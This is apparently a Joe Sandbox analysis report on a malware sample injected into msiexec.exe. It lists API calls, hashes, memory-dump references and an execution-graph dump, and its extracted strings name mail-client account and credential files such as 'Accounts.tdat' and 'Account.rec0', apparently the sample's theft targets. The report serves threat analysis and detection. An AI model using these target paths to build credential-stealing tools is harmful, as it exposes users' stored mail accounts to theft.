                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,2232190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 2232165A
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,2232190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 22321661
                                                                                        • lstrcatW.KERNEL32(00001008,?,?,?,?,?,2232190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 22321686
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                        • String ID:
                                                                                        • API String ID: 1922816806-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 22321038
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2232104B
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22321061
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 22321075
                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 22321090
                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 223210B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$AttributesFilelstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 3594823470-0
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,22323518,223223F1,22321F17), ref: 22323864
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 22323872
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2232388B
                                                                                        • SetLastError.KERNEL32(00000000,?,22323518,223223F1,22321F17), ref: 223238DD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,22326C6C), ref: 22325AFA
                                                                                        • _free.LIBCMT ref: 22325B2D
                                                                                        • _free.LIBCMT ref: 22325B55
                                                                                        • SetLastError.KERNEL32(00000000,?,?,22326C6C), ref: 22325B62
                                                                                        • SetLastError.KERNEL32(00000000,?,?,22326C6C), ref: 22325B6E
                                                                                        • _abort.LIBCMT ref: 22325B74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 3160817290-0
                                                                                        APIs
                                                                                          • Part of subcall function 22321E89: lstrlenW.KERNEL32(?,?,?,?,?,223210DF,?,?,?,00000000), ref: 22321E9A
                                                                                          • Part of subcall function 22321E89: lstrcatW.KERNEL32(?,?,?,223210DF,?,?,?,00000000), ref: 22321EAC
                                                                                          • Part of subcall function 22321E89: lstrlenW.KERNEL32(?,?,223210DF,?,?,?,00000000), ref: 22321EB3
                                                                                          • Part of subcall function 22321E89: lstrlenW.KERNEL32(?,?,223210DF,?,?,?,00000000), ref: 22321EC8
                                                                                          • Part of subcall function 22321E89: lstrcatW.KERNEL32(?,223210DF,?,223210DF,?,?,?,00000000), ref: 22321ED3
                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2232122A
                                                                                          • Part of subcall function 2232173A: _strlen.LIBCMT ref: 22321855
                                                                                          • Part of subcall function 2232173A: _strlen.LIBCMT ref: 22321869
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                        • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                        • API String ID: 4036392271-1520055953
                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,22324AEA,?,?,22324A8A,?,22332238,0000000C,22324BBD,00000000,00000000), ref: 22324B59
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 22324B6C
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,22324AEA,?,?,22324A8A,?,22332238,0000000C,22324BBD,00000000,00000000,?,22322082), ref: 22324B8F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 2232715C
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2232717F
                                                                                          • Part of subcall function 223256D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22325702
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 223271A5
                                                                                        • _free.LIBCMT ref: 223271B8
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 223271C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 336800556-0
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,2232636D,22325713,00000000,?,22322249,?,?,22321D66,00000000,?,?,00000000), ref: 22325B7F
                                                                                        • _free.LIBCMT ref: 22325BB4
                                                                                        • _free.LIBCMT ref: 22325BDB
                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22325BE8
                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22325BF1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free
                                                                                        • String ID:
                                                                                        • API String ID: 3170660625-0
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,223210DF,?,?,?,00000000), ref: 22321E9A
                                                                                        • lstrcatW.KERNEL32(?,?,?,223210DF,?,?,?,00000000), ref: 22321EAC
                                                                                        • lstrlenW.KERNEL32(?,?,223210DF,?,?,?,00000000), ref: 22321EB3
                                                                                        • lstrlenW.KERNEL32(?,?,223210DF,?,?,?,00000000), ref: 22321EC8
                                                                                        • lstrcatW.KERNEL32(?,223210DF,?,223210DF,?,?,?,00000000), ref: 22321ED3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$lstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 493641738-0
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 223291D0
                                                                                          • Part of subcall function 2232571E: HeapFree.KERNEL32(00000000,00000000,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?), ref: 22325734
                                                                                          • Part of subcall function 2232571E: GetLastError.KERNEL32(?,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?,?), ref: 22325746
                                                                                        • _free.LIBCMT ref: 223291E2
                                                                                        • _free.LIBCMT ref: 223291F4
                                                                                        • _free.LIBCMT ref: 22329206
                                                                                        • _free.LIBCMT ref: 22329218
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 2232536F
                                                                                          • Part of subcall function 2232571E: HeapFree.KERNEL32(00000000,00000000,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?), ref: 22325734
                                                                                          • Part of subcall function 2232571E: GetLastError.KERNEL32(?,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?,?), ref: 22325746
                                                                                        • _free.LIBCMT ref: 22325381
                                                                                        • _free.LIBCMT ref: 22325394
                                                                                        • _free.LIBCMT ref: 223253A5
                                                                                        • _free.LIBCMT ref: 223253B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 22324C1D
                                                                                        • _free.LIBCMT ref: 22324CE8
                                                                                        • _free.LIBCMT ref: 22324CF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$FileModuleName
                                                                                        • String ID: C:\Windows\System32\msiexec.exe
                                                                                        • API String ID: 2506810119-1382325751
                                                                                        • Opcode ID: e68d946f17d01ce79b721578f4db952487c71377492e08cfeffecafc13eb0102
                                                                                        • Instruction ID: 7b44650b0610800cc63742be8c208fbce9af1fb066ab833f4929b6ecd974cd56
                                                                                        • Opcode Fuzzy Hash: e68d946f17d01ce79b721578f4db952487c71377492e08cfeffecafc13eb0102
                                                                                        • Instruction Fuzzy Hash: 673177B1A40B18FFD722CF99C980D9EBBFCEF95724F109256EA0497211D6748E41CBA0
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,22326FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 22328731
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 223287BA
                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 223287CC
                                                                                        • __freea.LIBCMT ref: 223287D5
                                                                                          • Part of subcall function 223256D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22325702
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                        • String ID:
                                                                                        • API String ID: 2652629310-0
                                                                                        • Opcode ID: 754b452b298ffccafe0f58437a8d867e486590ce3e0a1405e14e58c533a91139
                                                                                        • Instruction ID: 7586a3f0b6834078c9f444e478fb12f5dd5e1785963ec734d69e312dcbbbe5b9
                                                                                        • Opcode Fuzzy Hash: 754b452b298ffccafe0f58437a8d867e486590ce3e0a1405e14e58c533a91139
                                                                                        • Instruction Fuzzy Hash: 7B31BE72A0071AABDF298F68CC80EAF7BA9EB44314F414268FD04DB150E735DD51CBA0
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(2232C7DD), ref: 2232C7E6
                                                                                        • GetModuleHandleA.KERNEL32(?,2232C7DD), ref: 2232C838
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 2232C860
                                                                                          • Part of subcall function 2232C803: GetProcAddress.KERNEL32(00000000,2232C7F4), ref: 2232C804
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID:
                                                                                        • API String ID: 1646373207-0
                                                                                        • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                        • Instruction ID: 5ad819b690b694b014f47bb269516ac808a64dc750aaef9287fe2a5bb336e23b
                                                                                        • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                        • Instruction Fuzzy Hash: 0A01F100945F9138EB2156744D01EBAAFDC9B277A4B23DF96E240C7293D9B18E06C3F6
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,22321D66,00000000,00000000,?,22325C88,22321D66,00000000,00000000,00000000,?,22325E85,00000006,FlsSetValue), ref: 22325D13
                                                                                        • GetLastError.KERNEL32(?,22325C88,22321D66,00000000,00000000,00000000,?,22325E85,00000006,FlsSetValue,2232E190,FlsSetValue,00000000,00000364,?,22325BC8), ref: 22325D1F
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,22325C88,22321D66,00000000,00000000,00000000,?,22325E85,00000006,FlsSetValue,2232E190,FlsSetValue,00000000), ref: 22325D2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 3177248105-0
                                                                                        • Opcode ID: e16e34847ec3921fbc00445e2e2e3440568a3faead74d5902c76135ec446388f
                                                                                        • Instruction ID: 6b4290f002c465085903029b8a951db0fe30e4bd0658fffd4d2102b2d8d20d98
                                                                                        • Opcode Fuzzy Hash: e16e34847ec3921fbc00445e2e2e3440568a3faead74d5902c76135ec446388f
                                                                                        • Instruction Fuzzy Hash: 47012477241B26ABC3164EA88C58F46779CEF05AA1B110B26FE0AD7145C724CE01CAE0
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 2232655C
                                                                                          • Part of subcall function 223262BC: IsProcessorFeaturePresent.KERNEL32(00000017,223262AB,00000000,?,?,?,?,00000016,?,?,223262B8,00000000,00000000,00000000,00000000,00000000), ref: 223262BE
                                                                                          • Part of subcall function 223262BC: GetCurrentProcess.KERNEL32(C0000417), ref: 223262E0
                                                                                          • Part of subcall function 223262BC: TerminateProcess.KERNEL32(00000000), ref: 223262E7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                        • String ID: *?$.
                                                                                        • API String ID: 2667617558-3972193922
                                                                                        • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                        • Instruction ID: 4423722bad7d7b7e2229d88f6b3137aa34d1693fc524a206293524b82c051b1b
                                                                                        • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                        • Instruction Fuzzy Hash: 54519E75E0070AEFDB14CFA8C980AADBBB9EF58314F24826AD954E7345E6359E018F50
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strlen
                                                                                        • String ID: : $Se.
                                                                                        • API String ID: 4218353326-4089948878
                                                                                        • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                        • Instruction ID: f086ca4b9972b899eb20bb3a1cc88c6a13144c648d3b5948b94a944d18d24df9
                                                                                        • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                        • Instruction Fuzzy Hash: 4711C4B1900748AECB10CFAC9840BDEFBFCAF59314F104056E645E7212E6705A028B65
                                                                                        APIs
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 22322903
                                                                                          • Part of subcall function 223235D2: RaiseException.KERNEL32(?,?,?,22322925,00000000,00000000,00000000,?,?,?,?,?,22322925,?,223321B8), ref: 22323632
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 22322920
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                        • String ID: Unknown exception
                                                                                        • API String ID: 3476068407-410509341
                                                                                        • Opcode ID: 6a3d8d590277d4ef02837f603b7432560a6f01f6ddc36e3aab0c0b270608c5c8
                                                                                        • Instruction ID: 35b26efea39d375e38fd351b6a6fcd9d78c02f96d266ef63ab889bd50a16bd98
                                                                                        • Opcode Fuzzy Hash: 6a3d8d590277d4ef02837f603b7432560a6f01f6ddc36e3aab0c0b270608c5c8
                                                                                        • Instruction Fuzzy Hash: A8F0A434A00B0C778B14A6A4ED44DA9777C7B10750B504361EA25A6491EBF1EE26C5C0
                                                                                        APIs
                                                                                        • GetOEMCP.KERNEL32(00000000,?,?,22326C7C,?), ref: 22326A1E
                                                                                        • GetACP.KERNEL32(00000000,?,?,22326C7C,?), ref: 22326A35
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: |l2"
                                                                                        • API String ID: 0-2037442537
                                                                                        • Opcode ID: 0e0d73e4fe81f290368bc8d82f08681a6afd827fad9fc6b578baaa5609e79a5b
                                                                                        • Instruction ID: f0da75427e15c2937259bbbef846082acfea24cb60149fd52114ca2bd43e88fc
                                                                                        • Opcode Fuzzy Hash: 0e0d73e4fe81f290368bc8d82f08681a6afd827fad9fc6b578baaa5609e79a5b
                                                                                        • Instruction Fuzzy Hash: 8EF04FB08407098BD711DBA8C598B6C7778FF40335F548749F8398A1DADB799E85CB81

                                                                                        Execution Graph

                                                                                        Execution Coverage:5.6%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:1.3%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:76
38328->38332 38333 4458f9 38329->38333 38331 445a00 memset memset 38744 414c2e 38331->38744 38340 44599c 38332->38340 38341 40b2cc 27 API calls 38333->38341 38334 44558c 38579 444b06 38334->38579 38335 44557a 38335->38334 38791 4136c0 CoTaskMemFree 38335->38791 38606 403fbe memset memset memset memset memset 38337->38606 38350 40b2cc 27 API calls 38340->38350 38351 445909 38341->38351 38353 4087b3 337 API calls 38342->38353 38344 445bca 38352 445c8b memset memset 38344->38352 38408 445cf0 38344->38408 38345 445b38 memset memset memset 38356 445bd4 38345->38356 38357 445b98 38345->38357 38346 445849 38807 40b1ab free free 38346->38807 38365 4459ac 38350->38365 38362 409d1f 6 API calls 38351->38362 38366 414c2e 14 API calls 38352->38366 38363 445621 38353->38363 38354 445585 38792 41366b FreeLibrary 38354->38792 38355 44589f 38808 40b1ab free free 38355->38808 38360 414c2e 14 API calls 38356->38360 38357->38356 38368 445ba2 38357->38368 38358 40b2cc 27 API calls 38370 445a4f 38358->38370 38373 445be2 38360->38373 38361 403335 38508 4452e5 45 API calls 38361->38508 38376 445919 38362->38376 38793 4454bf 20 API calls 38363->38793 38364 445823 38364->38346 38386 4087b3 337 API calls 38364->38386 38377 409d1f 6 API calls 38365->38377 38378 445cc9 38366->38378 38878 4099c6 wcslen 38368->38878 38369 4456b2 38795 40b1ab free free 38369->38795 38757 409d1f wcslen wcslen 38370->38757 38371->38325 38405 44594a 38371->38405 38384 40b2cc 27 API calls 38373->38384 38374 445d3d 38404 40b2cc 27 API calls 38374->38404 38375 445d88 memset memset memset 38387 414c2e 14 API calls 38375->38387 38809 409b98 GetFileAttributesW 38376->38809 38388 4459bc 38377->38388 38389 409d1f 6 API calls 38378->38389 38379 445879 38379->38355 38390 4087b3 337 API calls 38379->38390 38381 445bb3 38881 445403 memset 38381->38881 38382 445680 38382->38369 38629 4087b3 memset 38382->38629 38393 445bf3 38384->38393 38386->38364 38396 445dde 38387->38396 38874 409b98 GetFileAttributesW 38388->38874 38398 
445ce1 38389->38398 38390->38379 38403 409d1f 6 API calls 38393->38403 38394 445928 38394->38405 38810 40b6ef 38394->38810 38406 40b2cc 27 API calls 38396->38406 38898 409b98 GetFileAttributesW 38398->38898 38402 40b2cc 27 API calls 38410 445a94 38402->38410 38412 445c07 38403->38412 38413 445d54 _wcsicmp 38404->38413 38405->38328 38417 4459ed 38405->38417 38416 445def 38406->38416 38407 4459cb 38407->38417 38424 40b6ef 249 API calls 38407->38424 38408->38361 38408->38374 38408->38375 38409 445389 255 API calls 38409->38344 38762 40ae18 38410->38762 38411 44566d 38411->38324 38680 413d4c 38411->38680 38420 445389 255 API calls 38412->38420 38421 445d71 38413->38421 38485 445d67 38413->38485 38415 445665 38794 40b1ab free free 38415->38794 38422 409d1f 6 API calls 38416->38422 38417->38331 38458 445b22 38417->38458 38426 445c17 38420->38426 38899 445093 23 API calls 38421->38899 38429 445e03 38422->38429 38424->38417 38425 4456d8 38431 40b2cc 27 API calls 38425->38431 38432 40b2cc 27 API calls 38426->38432 38428 44563c 38428->38415 38434 4087b3 337 API calls 38428->38434 38900 409b98 GetFileAttributesW 38429->38900 38430 40b6ef 249 API calls 38430->38361 38436 4456e2 38431->38436 38437 445c23 38432->38437 38433 445d83 38433->38361 38434->38428 38796 413fa6 _wcsicmp _wcsicmp 38436->38796 38441 409d1f 6 API calls 38437->38441 38439 445e12 38446 445e6b 38439->38446 38453 40b2cc 27 API calls 38439->38453 38444 445c37 38441->38444 38442 445aa1 38445 445b17 38442->38445 38462 445ab2 memset 38442->38462 38476 409d1f 6 API calls 38442->38476 38769 40add4 38442->38769 38774 445389 38442->38774 38783 40ae51 38442->38783 38443 4456eb 38449 4456fd memset memset memset memset 38443->38449 38450 4457ea 38443->38450 38451 445389 255 API calls 38444->38451 38875 40aebe 38445->38875 38902 445093 23 API calls 38446->38902 38797 409c70 wcscpy wcsrchr 38449->38797 38800 413d29 38450->38800 38457 445c47 38451->38457 38459 445e33 38453->38459 38455 445e7e 38461 445f67 38455->38461 38464 
